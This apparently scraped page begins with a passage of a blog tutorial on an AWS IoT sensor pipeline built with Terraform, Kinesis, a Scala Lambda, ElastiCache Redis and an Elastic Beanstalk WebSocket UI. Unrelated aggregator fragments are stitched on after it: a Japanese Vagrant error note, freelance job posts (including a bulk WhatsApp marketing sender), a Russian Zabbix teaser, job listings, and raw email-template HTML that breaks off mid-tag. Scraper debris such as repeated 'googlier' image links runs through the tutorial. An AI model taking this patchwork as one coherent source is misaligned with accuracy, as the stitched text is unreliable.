To setup the Firehose delivery stream we specify the destination type (s3) and configure it accordingly. As we created S3 buckets multiple times throughout this series we will omit the bucket resource here. The two parameters buffer_size (MB) and buffer_interval (s) control how long we are waiting for new data to arrive before persisting a partition to S3.

resource "aws_kinesis_firehose_delivery_stream" "sensors" {
  name        = "${local.project_name}-s3"
  destination = "s3"

  s3_configuration {
    role_arn        = "${aws_iam_role.firehose.arn}"
    bucket_arn      = "${aws_s3_bucket.sensor_storage.arn}"
    buffer_size     = 5
    buffer_interval = 60
  }
}

The execution role needs to have permissions to access the S3 bucket as well as the Kinesis stream. Please find the policy document used below.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:AbortMultipartUpload",
        "s3:GetBucketLocation",
        "s3:GetObject",
        "s3:ListBucket",
        "s3:ListBucketMultipartUploads",
        "s3:PutObject"
      ],
      "Resource": [
        "${aws_s3_bucket.sensor_storage.arn}",
        "${aws_s3_bucket.sensor_storage.arn}/*"
      ]
    },
    {
      "Effect": "Allow",
      "Action": [
        "kinesis:DescribeStream",
        "kinesis:GetShardIterator",
        "kinesis:GetRecords"
      ],
      "Resource": "${aws_kinesis_stream.sensors.arn}"
    }
  ]
}

This should have our raw data persistence layer covered. All incoming messages will be dumped to S3. Let's tend to the Kinesis data stream next which is important for the data processing.

Kinesis Data Stream

kinesis data stream#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

The Kinesis data stream will have only one shard and a retention period of 24 hours. Each shard supports a certain read and write throughput, limited in the number and size of requests per time. You can scale out by adding more shards to your stream and choosing an appropriate partition key. We will keep the data for 24 hours, which is included in the base price.

resource "aws_kinesis_stream" "sensors" {
  name             = "${local.project_name}"
  shard_count      = 1
  retention_period = 24
}

Next, let's take a closer look at our Lambda function.

Lambda

lambda#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

By now you should already be familiar with creating Lambda handlers. This time we will make use of an additional library which will allow AWS to handle the deserialization of the KinesisEvent input automatically: aws-lambda-java-events. We also have to include amazon-kinesis-client and aws-java-sdk-kinesis.

The connection to Redis is done using the net.debasishg.redisclient package. Let's look at the code first and then go through it step by step.

class Handler extends RequestHandler[KinesisEvent, Void] {

  val port = System.getenv("redis_port").toInt
  val url = System.getenv("redis_url")

  override def handleRequest(input: KinesisEvent, context: Context): Void = {
    val logger = context.getLogger
    val redis = new RedisClient(url, port)
    val recordsWritten = input.getRecords.asScala.map { record =>
      val data = new String(record.getKinesis.getData.array())
      redis.set("sensorLatest", data)
      redis.incr("sensorCount")
    }
    redis.publish(
      channel = "sensors",
      msg = "updated"
    )
    val successAndFailure = recordsWritten.groupBy(_.isDefined).mapValues(_.length)
    logger.log(s"Successfully processed: ${successAndFailure.getOrElse(true, 0)}")
    logger.log(s"Failed: ${successAndFailure.getOrElse(false, 0)}")
    null
  }

}

Here's what happens:

  • Read $redis_url and $redis_port environment variables (error handling omitted)
  • For each incoming KinesisEvent, the Lambda function will be invoked. The event contains a list of records since the last invocation. We will see later how we can control this part.
  • Connect to the ElastiCache Redis instance. It might make sense to reuse the connection by setting it up outside of the request handling method. I am not sure about the thread safety and how AWS Lambda handles the object creation.
  • For each message update the latest message value and increase the counter. It would be more efficient to aggregate all records locally within the Lambda and update Redis with the results of the whole batch but I was too lazy to do that.
  • Publish to the sensors channel that new data has arrived so all clients can be notified.

As usual we have to define our Lambda resource. The Redis connection details will be passed via environment variables.

resource "aws_lambda_function" "kinesis" {
  function_name    = "${local.project_name}"
  filename         = "${local.lambda_artifact}"
  source_code_hash = "${base64sha256(file(local.lambda_artifact))}"
  handler          = "de.frosner.aws.iot.Handler"
  runtime          = "java8"
  role             = "${aws_iam_role.lambda_exec.arn}"
  memory_size      = 1024
  timeout          = 5

  environment {
    variables {
      redis_port = "${aws_elasticache_cluster.sensors.port}"
      redis_url  = "${aws_elasticache_cluster.sensors.cache_nodes.0.address}"
    }
  }
}

Last but not least we tell Lambda to listen to Kinesis events, making it poll for new messages. We choose the LATEST shard iterator, which corresponds to moving the offset always to the latest data, consuming every message only once. We could also decide to consume all records (TRIM_HORIZON) or starting from a given timestamp (AT_TIMESTAMP).

The batch size controls the maximum amount of messages processed by one Lambda call. Increasing it has a positive effect on the throughput, while on the other hand a small batch size might lead to better latency. Here's the Terraform resource definition for our event source mapping.

resource "aws_lambda_event_source_mapping" "event_source_mapping" {
  batch_size        = 10
  event_source_arn  = "${aws_kinesis_stream.sensors.arn}"
  enabled           = true
  function_name     = "${aws_lambda_function.kinesis.id}"
  starting_position = "LATEST"
}

In order to push data to the web layer, we will create our ElastiCache Redis instance in the following section.

ElastiCache Redis

redis#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

We will use a single cache.t2.micro instance running Redis 4.0. Similar to RDS we can also pass the apply_immediately flag to force updates even if outside the maintenance window.

resource "aws_elasticache_cluster" "sensors" {
  cluster_id           = "${local.project_name}"
  engine               = "redis"
  node_type            = "cache.t2.micro"
  num_cache_nodes      = 1
  parameter_group_name = "default.redis4.0"
  port                 = "${var.redis_port}"
  security_group_ids   = ["${aws_security_group.all.id}"]
  subnet_group_name    = "${aws_elasticache_subnet_group.private.name}"
  apply_immediately    = true
}

That's it! What is left is only the Elastic Beanstalk application for the UI.

Elastic Beanstalk Web UI

elastic beanstalk web ui#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

The Elastic Beanstalk application consists of a frontend and a backend. The frontend is in form of a single HTML file with JavaScript and CSS. Nothing fancy going on there. The backend is written in Scala and utilizes the same Redis library we already used in the Lambda function, as well as Akka HTTP for serving the static files and handling the WebSocket connections.

Frontend

The frontend will feature three outputs: The message count, the last message, and when it received the last update from the server. Below you will find a screenshot of the UI and the HTML code.

frontend#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

<html>
<head>
    <title>Sensor Data Example</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="http://fargo.io/code/jquery-1.9.1.min.js"></script>
    <link href="http://fargo.io/code/ubuntuFont.css" rel="stylesheet" type="text/css">
    <script src="main.js"></script>
</head>
<body>
<div>
    <p>Message count: <span id="messageCount"></span></p>
    <p>Last message: <span id="lastMessage"></span></p>
    <p>Last update: <span id="lastUpdate"></span></p>
</div>
<script>
$(document).ready(WebSocketTest);
</script>
</body>
</html>

The JavaScript part is also rather straightforward. We will use the built-in WebSocket support and provide handlers for onopen, onmessage, and onclose events. The onmessage event will parse the data received and fill the appropriate text fields. Note that we have to build the WebSocket URL using window.location, because it has to be an absolute URL in all the browsers I know.

var loc = window.location, protocol;
if (loc.protocol === "https:") {
    protocol = "wss:";
} else {
    protocol = "ws:";
}
var socketUrl = protocol + "//" + loc.host + loc.pathname + "ws";

function WebSocketTest() {
  if ("WebSocket" in window) {
    console.log("Connecting to " + socketUrl);
    var ws = new WebSocket(socketUrl);

    ws.onopen = function() {
      console.log("Connection established");
    };

    ws.onmessage = function (evt) {
      var msg = JSON.parse(evt.data);
      console.log("Message received: " + msg);
      $("#lastUpdate").text(new Date());
      $("#lastMessage").text(msg.latest);
      $("#messageCount").text(msg.count);
    };

    ws.onclose = function() {
      console.log("Connection closed");
    };
  } else {
     console.error("WebSocket not supported by your browser!");
  }
}

Backend

The backend consists of an Akka HTTP web server and two Redis connections. We have to use two connections here because Redis does not allow using the same connection for Pub/Sub and normal key value operations at the same time.

Let's look into the code. As always you need to have an actor system, actor materializer, and execution context if required. We are going to omit this for brevity reasons. Setting up the HTTP server with WebSocket support is illustrated in the following listing. We are routing two paths, one for the WebSocket connection and one for the static HTML file, which contains all JavaScript and CSS inline. We ignore all incoming messages and will forward messages coming from Redis to all clients. Both interface and port will be passed by Elastic Beanstalk.

val route =
  path("ws") {
    extractUpgradeToWebSocket { upgrade =>
      complete(upgrade.handleMessagesWithSinkSource(Sink.ignore, redisSource))
    }
  } ~ path("") {
    getFromResource("index.html")
  }

val interface = Option(System.getenv("INTERFACE")).getOrElse("0.0.0.0")
val port = System.getenv("PORT").toInt
val bindingFuture = Http().bindAndHandle(route, interface, port)

The next task is to define the Redis source. The Redis Pub/Sub API requires a callback function that is invoked for every message in the subscribed channel. This is not compatible with Akka Streams out of the box, so we have to use a little trick to transform our Redis messages to a Source object. The following listing illustrates the Redis source creation as well as the channel subscription.

val redis_port = System.getenv("redis_port").toInt
val redis_url = System.getenv("redis_url")
val redis = new RedisClient(redis_url, redis_port)
val redisPubSub = new RedisClient(redis_url, redis_port)

val (redisActor, redisSource) =
  Source.actorRef[String](1000, OverflowStrategy.dropTail)
    .map(s => TextMessage(s))
    .toMat(BroadcastHub.sink[TextMessage])(Keep.both)
    .run()

redisPubSub.subscribe("sensors") {
  case M(channel, message) =>
    val latest = redis.get("sensorLatest")
    val count = redis.get("sensorCount")
    redisActor ! s"""{ "latest": "${latest.getOrElse("0")}", "count": "${count.getOrElse("0")}" }"""
  case S(channel, noSubscribed) => println(s"Successfully subscribed to channel $channel")
  case other => println(s"Ignoring message from redis: $other")
}

Creating the Redis source is done using a combination of Source.actorRef and the BroadcastHub.sink. The source actor will emit every message it receives to the stream. We configure a buffer size of 1000 messages and discard the youngest element to make room for a new one in case of an overflow. Inside the subscription callback we can query Redis for the latest data and then send a JSON object to the Redis actor.

The broadcast hub sink emits a source we can plug into our WebSocket sink to generate the flow that will handle incoming WebSocket messages. As we need both, the actor and the source, we will keep both materialized values.

Now we can build our fat jar and upload it to S3. As it is basically the same procedure as in the Elastic Beanstalk post we are not going to go into detail at this point. Let's look at the Terraform resources next.

Terraform

First, we have to reference the fat jar inside the S3 bucket. Because the bucket has to exist before we can publish the jar using SBT, the Terraform deployment needs to happen in two stages. First we create only the artifact bucket and run sbt webui/publish, then we deploy the remaining infrastructure.

resource "aws_s3_bucket" "webui" {
  bucket        = "${local.project_name}-webui-artifacts"
  acl           = "private"
  force_destroy = true
}

data "aws_s3_bucket_object" "application-jar" {
  bucket = "${aws_s3_bucket.webui.id}"
  key    = "de/frosner/${local.webui_project_name}_2.12/${var.webui_version}/${local.webui_project_name}_2.12-${var.webui_version}-assembly.jar"
}

Next we can define the Elastic Beanstalk application, environment, and version. We are omitting all settings related to networking and execution at this point. The Redis connection details will be passed as environment variables. To enable WebSocket communication through the load balancer, we have to switch the protocol from HTTP to TCP using the LoadBalancerPortProtocol setting. In a proper setup you would also have to adjust the nginx configuration because otherwise the connection might be terminated irregularly.

resource "aws_elastic_beanstalk_application" "webui" {
  name = "${local.project_name}"
}

resource "aws_elastic_beanstalk_environment" "webui" {
  name                = "${local.project_name}"
  application         = "${aws_elastic_beanstalk_application.webui.id}"
  solution_stack_name = "64bit Amazon Linux 2018.03 v2.7.1 running Java 8"

  setting {
    namespace = "aws:elasticbeanstalk:application:environment"
    name      = "redis_url"
    value     = "${aws_elasticache_cluster.sensors.cache_nodes.0.address}"
  }
  setting {
    namespace = "aws:elasticbeanstalk:application:environment"
    name      = "redis_port"
    value     = "${aws_elasticache_cluster.sensors.port}"
  }
  setting {
    namespace = "aws:elb:loadbalancer"
    name      = "LoadBalancerPortProtocol"
    value     = "TCP"
  }
}

resource "aws_elastic_beanstalk_application_version" "default" {
  name        = "${local.webui_assembly_prefix}"
  application = "${aws_elastic_beanstalk_application.webui.name}"
  description = "application version created by terraform"
  bucket      = "${aws_s3_bucket.webui.id}"
  key         = "${data.aws_s3_bucket_object.application-jar.key}"
}

output "aws_command" {
  value = "aws elasticbeanstalk update-environment --application-name ${aws_elastic_beanstalk_application.webui.name} --version-label ${aws_elastic_beanstalk_application_version.default.name} --environment-name ${aws_elastic_beanstalk_environment.webui.name}"
}

That's it! Now we have all required resources defined, except for the networking part which we skipped intentionally. Note that you cannot use the default VPC and subnets and security groups as otherwise neither the Lambda nor the Elastic Beanstalk EC2 instances can connect to ElastiCache. Next let's see our baby in action!

Deployment and Usage

As mentioned before the deployment is done in multiple steps. First we create only the S3 bucket for uploading the Elastic Beanstalk artifact. Then we provision the remaining infrastructure. As Terraform does not support deploying Elastic Beanstalk application versions at this point we will execute the generated AWS CLI command afterwards.

cd terraform && terraform apply -auto-approve -target=aws_s3_bucket.webui; cd -
sbt kinesis/assembly && sbt webui/publish && cd terraform && terraform apply -auto-approve; cd -
cd terraform && $(terraform output | grep 'aws_command' | cut -d'=' -f2) && cd -

After completion we can open the Elastic Beanstalk environment URL to see the UI. If we assigned a DNS name we could use that one. Then we open the AWS IoT Console in another browser tab and navigate to the Test page. There we scroll to the Publish section, enter topic/sensors as the topic and can start publishing MQTT messages.

demo#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Conclusion

In this blog post we have seen how to route MQTT messages towards Kinesis streams using IoT Core rules. Kinesis Firehose delivery streams are a convenient way to automatically persist a data stream in batches. Kinesis data streams as Lambda event sources give a more granular control over what to do with the data. With ElastiCache Redis as an intermediate storage layer and notification service we enable clients to get near-real time updates of the sensors.

Looking at the example solution we built there are a few things we could have done differently. Instead of having to pay for the Firehose delivery stream and the Kinesis data stream at the same time we could only use the data stream and add a custom polling consumer that persists the data in batches, potentially performing some basic format conversions like writing in a compressed columnar storage format.

While configuring Kinesis as an event source for Lambda works great it might become a bit costly if the Lambda function is constantly running. In that case it could pay off to use a custom consumer deployed in ECS EC2, for example.

Using Redis as the intermediate storage layer is only one out of many options. Picking the right data store for your problem is not trivial. Redis is fast because it is in-memory. If you need a more durable and scalable database, DynamoDB is also an option. Clients can subscribe to changes in a DynamoDB table through DynamoDB streams. Maybe you also want to add ElasticSearch or Graphite as consumers.

What do you think? Did you use AWS IoT already for one of your projects? Did you also manage to automate the device management using Terraform? Please comment below!

Cover image by Wilgengebroed on Flickr - Cropped and sign removed from Internet of things signed by the author.jpg, CC BY 2.0, https://commons.wikimedia.org/w/index.php?curid=32745645


          VagrantでVCCW環境の設定においてvagrant upでのエラー      Cache   Translate Page   Web Page Cache   
WordPressを動かすためにPHPやApatch、データベースソフトのMySql、環境移行のときに用い得るruby環境下で動くwordmoveなどの各種ツールのインストールや設定を自動化しているのが、VCCWである。…
          Personalizar extensión de Joomla      Cache   Translate Page   Web Page Cache   
Necesito modificar una extensión paga de Joomla llamada JSN UniForm. Esta permite crear formularios y dan opción a subir un archivo (En este caso solo fotos) dentro del formulario. Los cambios que necesito... (Budget: $10 - $30 USD, Jobs: CSS, HTML, Joomla, MySQL, PHP)
          Мониторинг номеров Zadarma в Zabbix      Cache   Translate Page   Web Page Cache   
Предлагаю готовый шаблон для Zabbix и скрипт на Python, для автообнаружения новых номеров провайдера Zadarma(новых, всмысле купленных вами номеров).

В шаблоне есть несколько триггерров и основная информация о номерах. Скрипт работатет с API Zadarma или с базой данных MySQL.

Для работы с MySQL, необходимо заранее по крону или прямо из диалплана с помощью отдельного скрипта положить туда данные.

Оба скрипта под катом.
Читать дальше →
           [HTML][MySQL][PHP]Pobranie daty do bazy danych       Cache   Translate Page   Web Page Cache   
none
          zlecę napisanie prostej bazy w php i mysql      Cache   Translate Page   Web Page Cache   
none
          Delivery Module Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page   Web Page Cache   
FULL - STACK DEVELOPER- JAVA - JAVA-JAVA J2EE /SPRING/RESTFUL/ SOAP/ANGULARJS/NODEJS/RDBMS/NOSQL (MONGODB/CASSANDRA/MYSQL) Hands-on with Front End...
From Mphasis - Thu, 21 Jun 2018 12:28:35 GMT - View all Bengaluru, Karnataka jobs
          Wordpress to SuiteCRM integration      Cache   Translate Page   Web Page Cache   
This project involves the creation/update of SuiteCRM record based wordpress record. The web application makes use of Wordpress Events Tickets Plugin to register attendees for a classes. The plugin uses... (Budget: $30 - $250 USD, Jobs: CRM, MySQL, PHP, Software Architecture, WordPress)
          Software Developer - UNIVA - Toronto, ON      Cache   Translate Page   Web Page Cache   
Some experience with databases such as Oracle, BerkeleyDB, Postgres, or MySQL. Univa is currently seeking a Software Developer for our Product Engineering team...
From UNIVA - Mon, 23 Apr 2018 05:57:51 GMT - View all Toronto, ON jobs
          Wordpress to SuiteCRM integration      Cache   Translate Page   Web Page Cache   
This project involves the creation/update of SuiteCRM record based wordpress record. The web application makes use of Wordpress Events Tickets Plugin to register attendees for a classes. The plugin uses... (Budget: $30 - $250 USD, Jobs: CRM, MySQL, PHP, Software Architecture, WordPress)
          Developer, Back End - Java/Spring /Hibernate/RESTful API, etc.- Montreal - TouchTunes / PlayNetwork - Montréal, QC      Cache   Translate Page   Web Page Cache   
Experience developing applications with MySQL, Oracle and NoSQL data stores. Developer, Back End - Java/Spring /Hibernate/RESTful API, etc....
From TouchTunes / PlayNetwork - Tue, 10 Jul 2018 23:47:40 GMT - View all Montréal, QC jobs
          Backend Developer - Octagon Technology Staffing - Toronto, ON      Cache   Translate Page   Web Page Cache   
Experience with database technologies – at least one of MySQL, Oracle, PostgreSQL, MongoDB or Cassandra. Octagon is seeking a Full-time Back-end Developer for... $70,000 - $100,000 a year
From Dice - Thu, 14 Jun 2018 04:31:21 GMT - View all Toronto, ON jobs
          Sr Software Engineer - Full-Stack - CA Technologies - Vancouver, BC      Cache   Translate Page   Web Page Cache   
Database – MySQL, PostgreSQL, Oracle, SQL Server. Do you want to help eliminate barriers between ideas and business outcomes?...
From CA Technologies - Fri, 20 Apr 2018 21:46:04 GMT - View all Vancouver, BC jobs
          Wordpress to SuiteCRM integration      Cache   Translate Page   Web Page Cache   
This project involves the creation/update of SuiteCRM record based wordpress record. The web application makes use of Wordpress Events Tickets Plugin to register attendees for a classes. The plugin uses... (Budget: $30 - $250 USD, Jobs: CRM, MySQL, PHP, Software Architecture, WordPress)
          Prestashop module for crawling products      Cache   Translate Page   Web Page Cache   
I want a person for doing a prestashop module, it has to crawle a website for importing products and attributes. I have the basic module skeleton and the structure of classes for the crawler, I hope you... (Budget: €30 - €250 EUR, Jobs: eCommerce, MySQL, PHP, Prestashop, Software Architecture)
          Prestashop module for crawling products      Cache   Translate Page   Web Page Cache   
I want a person for doing a prestashop module, it has to crawle a website for importing products and attributes. I have the basic module skeleton and the structure of classes for the crawler, I hope you... (Budget: €30 - €250 EUR, Jobs: eCommerce, MySQL, PHP, Prestashop, Software Architecture)
          instance disappeared from dashboard.      Cache   Translate Page   Web Page Cache   
I have two startups. I created one aws account for each of them (each account has different names, email addresses and logins). I created one MySql Instance for each account, and each instance has its own credentials. So nothing should be shared...
          Software Engineer -React.JS, RoR, MySQL- (125K - 140K)      Cache   Translate Page   Web Page Cache   
IL-Naperville, Job title: Full-Stack Software Engineer Job Location: Naperville, IL Required Skills: Ruby On Rails, React.JS (Preferred), MySQL, SQL, Angular.JS, or Amber.JS Salary: 125K - 140K Located in beautiful Libertyville, IL, we are the leading Sr. level performance capital level management company in the state of Illinois. We encourage and emphasize collaboration and innovation in all of our employees. W
          RDS MySQL Latency Issues      Cache   Translate Page   Web Page Cache   
We are facing latency issues in our RDS MySql instance, located in "sa-east".
...
          Optimizing my php code.      Cache   Translate Page   Web Page Cache   
I am looking for a very experienced database and query developer. I have a currently a query that is too heavy and need an optimization ( maybe rewrite ) I am looking for someone that can handle stored... (Budget: $10 - $30 USD, Jobs: MySQL, PHP)
          Sending bulk Whatsapp messages via API - marketing      Cache   Translate Page   Web Page Cache   
need to develop script to enable us to send bulk Whatsapp messages using an API such as php need to be able to upload a text file with phone numbers and insert a message that gets sent to all number in text file Automatically... (Budget: $30 - $250 USD, Jobs: Javascript, MySQL, PHP, Python, Software Architecture)
          Dell EMC Offers Mid-Size Organizations Simply Powerful Data Protection at the Lowest Cost to Protect      Cache   Translate Page   Web Page Cache   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" style="background:#f6f6f6!important">  <head>    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">    <meta name="viewport" content="width=device-width">    <title>PRNJ Push Email - Headlines</title>    <style>@font-face{font-family:Montserrat;font-style:normal;font-weight:400;src:local('Montserrat Regular'),local('Montserrat-Regular'),url(https://fonts.gstatic.com/s/montserrat/v10/SKK6Nusyv8QPNMtI4j9J2wsYbbCjybiHxArTLjt7FRU.woff2) format('woff2');unicode-range:U+0102-0103,U+1EA0-1EF9,U+20AB}@font-face{font-family:Montserrat;font-style:normal;font-weight:400;src:local('Montserrat Regular'),local('Montserrat-Regular'),url(https://fonts.gstatic.com/s/montserrat/v10/gFXtEMCp1m_YzxsBpKl68gsYbbCjybiHxArTLjt7FRU.woff2) format('woff2');unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:Montserrat;font-style:normal;font-weight:400;src:local('Montserrat Regular'),local('Montserrat-Regular'),url(https://fonts.gstatic.com/s/montserrat/v10/zhcz-_WihjSQC0oHJ9TCYAzyDMXhdD8sAj6OAJTFsBI.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215}@font-face{font-family:Montserrat;font-style:normal;font-weight:500;src:local('Montserrat Medium'),local('Montserrat-Medium'),url(https://fonts.gstatic.com/s/montserrat/v10/BYPM-GE291ZjIXBWrtCweiyNCiQPWMSUbZmR9GEZ2io.woff2) format('woff2');unicode-range:U+0102-0103,U+1EA0-1EF9,U+20AB}@font-face{font-family:Montserrat;font-style:normal;font-weight:500;src:local('Montserrat Medium'),local('Montserrat-Medium'),url(https://fonts.gstatic.com/s/montserrat/v10/BYPM-GE291ZjIXBWrtCwevfgCb1svrO3-Ym-Rpjvnho.woff2) format('woff2');unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:Montserrat;font-style:normal;font-weight:500;src:local('Montserrat Medium'),local('Montserrat-Medium'),url(https://fonts.gstatic.com/s/montserrat/v10/BYPM-GE291ZjIXBWrtCweteM9fzAXBk846EtUMhet0E.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215}@font-face{font-family:Montserrat;font-style:normal;font-weight:600;src:local('Montserrat SemiBold'),local('Montserrat-SemiBold'),url(https://fonts.gstatic.com/s/montserrat/v10/q2OIMsAtXEkOulLQVdSl053YFo3oYz9Qj7-_6Ux-KkY.woff2) format('woff2');unicode-range:U+0102-0103,U+1EA0-1EF9,U+20AB}@font-face{font-family:Montserrat;font-style:normal;font-weight:600;src:local('Montserrat SemiBold'),local('Montserrat-SemiBold'),url(https://fonts.gstatic.com/s/montserrat/v10/q2OIMsAtXEkOulLQVdSl02tASdhiysHpWmctaYEsrdw.woff2) format('woff2');unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:Montserrat;font-style:normal;font-weight:600;src:local('Montserrat SemiBold'),local('Montserrat-SemiBold'),url(https://fonts.gstatic.com/s/montserrat/v10/q2OIMsAtXEkOulLQVdSl03XcDWh-RbO457623Zi1kyw.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215}@font-face{font-family:Montserrat;font-style:italic;font-weight:400;src:local('Montserrat Italic'),local('Montserrat-Italic'),url(https://fonts.gstatic.com/s/montserrat/v10/-iqwlckIhsmvkx0N6rwPmvgrLsWo7Jk1KvZser0olKY.woff2) format('woff2');unicode-range:U+0102-0103,U+1EA0-1EF9,U+20AB}@font-face{font-family:Montserrat;font-style:italic;font-weight:400;src:local('Montserrat Italic'),local('Montserrat-Italic'),url(https://fonts.gstatic.com/s/montserrat/v10/-iqwlckIhsmvkx0N6rwPmojoYw3YTyktCCer_ilOlhE.woff2) format('woff2');unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:Montserrat;font-style:italic;font-weight:400;src:local('Montserrat Italic'),local('Montserrat-Italic'),url(https://fonts.gstatic.com/s/montserrat/v10/-iqwlckIhsmvkx0N6rwPmhampu5_7CjHW5spxoeN3Vs.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215}@font-face{font-family:Montserrat;font-style:italic;font-weight:500;src:local('Montserrat Medium Italic'),local('Montserrat-MediumItalic'),url(https://fonts.gstatic.com/s/montserrat/v10/zhwB3-BAdyKDf0geWr9FtxZpeM_Zh6uJFYM6sEJ7jls.woff2) format('woff2');unicode-range:U+0102-0103,U+1EA0-1EF9,U+20AB}@font-face{font-family:Montserrat;font-style:italic;font-weight:500;src:local('Montserrat Medium Italic'),local('Montserrat-MediumItalic'),url(https://fonts.gstatic.com/s/montserrat/v10/zhwB3-BAdyKDf0geWr9Ft_zIndX4RYN5BhIaIFu8k_A.woff2) format('woff2');unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:Montserrat;font-style:italic;font-weight:500;src:local('Montserrat Medium Italic'),local('Montserrat-MediumItalic'),url(https://fonts.gstatic.com/s/montserrat/v10/zhwB3-BAdyKDf0geWr9Ft9CODO6R-QMzjsZRstdx6VU.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215}@font-face{font-family:Montserrat;font-style:italic;font-weight:600;src:local('Montserrat SemiBold Italic'),local('Montserrat-SemiBoldItalic'),url(https://fonts.gstatic.com/s/montserrat/v10/zhwB3-BAdyKDf0geWr9Ft8gif8LsIGoxiaDHvDrXzKs.woff2) format('woff2');unicode-range:U+0102-0103,U+1EA0-1EF9,U+20AB}@font-face{font-family:Montserrat;font-style:italic;font-weight:600;src:local('Montserrat SemiBold Italic'),local('Montserrat-SemiBoldItalic'),url(https://fonts.gstatic.com/s/montserrat/v10/zhwB3-BAdyKDf0geWr9Ft34iWgrNFAiT-cwBwpMBdno.woff2) format('woff2');unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:Montserrat;font-style:italic;font-weight:600;src:local('Montserrat SemiBold Italic'),local('Montserrat-SemiBoldItalic'),url(https://fonts.gstatic.com/s/montserrat/v10/zhwB3-BAdyKDf0geWr9Ft93uLUHnU24AL_1IdxwhTqs.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215}@media only screen{html{min-height:100%;background:#f3f3f3}}@media only screen and (max-width:630px){table.body img{width:auto;height:auto}table.body center{min-width:0!important}table.body .container{width:95%!important}table.body .columns{height:auto!important;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;padding-left:30px!important;padding-right:30px!important}table.body .columns .columns{padding-left:0!important;padding-right:0!important}th.small-12{display:inline-block!important;width:100%!important}.columns th.small-12{display:block!important;width:100%!important}table.menu{width:100%!important}table.menu td,table.menu th{width:auto!important;display:inline-block!important}table.menu[align=center]{width:auto!important}}</style>  </head>  <body style="-moz-box-sizing:border-box;-ms-text-size-adjust:100%;-webkit-box-sizing:border-box;-webkit-text-size-adjust:100%;Margin:0;background:#f6f6f6!important;box-sizing:border-box;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;min-width:100%;padding:0;text-align:left;width:100%!important">          <span class="preheader" style="color:#f3f3f3;display:none!important;font-size:1px;line-height:1px;max-height:0;max-width:0;mso-hide:all!important;opacity:0;overflow:hidden;visibility:hidden"></span>  <table class="body" style="Margin:0;background:#f6f6f6!important;border-collapse:collapse;border-spacing:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;height:100%;line-height:1.3;margin:0;padding:0;text-align:left;vertical-align:top;width:100%">  <tr style="padding:0;text-align:left;vertical-align:top">    <td class="center" align="center" valign="top" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;hyphens:auto;line-height:1.3;margin:0;padding:0;text-align:left;vertical-align:top;word-wrap:break-word"> <center data-parsed="" style="min-width:600px;width:100%"><!--[if mso]><style type="text/css">body, table, table.body, h1, h2, h3, h4, h5, h6, p, td, th, a { font-family: 'Montserrat', Arial, sans-serif!important;}</style><![endif]--><table align="center" class="container float-center" style="Margin:0 auto;background:#fefefe;border-collapse:collapse;border-spacing:0;float:none;margin:0 auto;padding:0;text-align:center;vertical-align:top;width:600px"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;hyphens:auto;line-height:1.3;margin:0;padding:0;text-align:left;vertical-align:top;word-wrap:break-word"> <table class="row no-background" style="background:#f6f6f6;border-collapse:collapse;border-spacing:0;display:table;padding:0;position:relative;text-align:left;vertical-align:top;width:100%"><tbody><tr 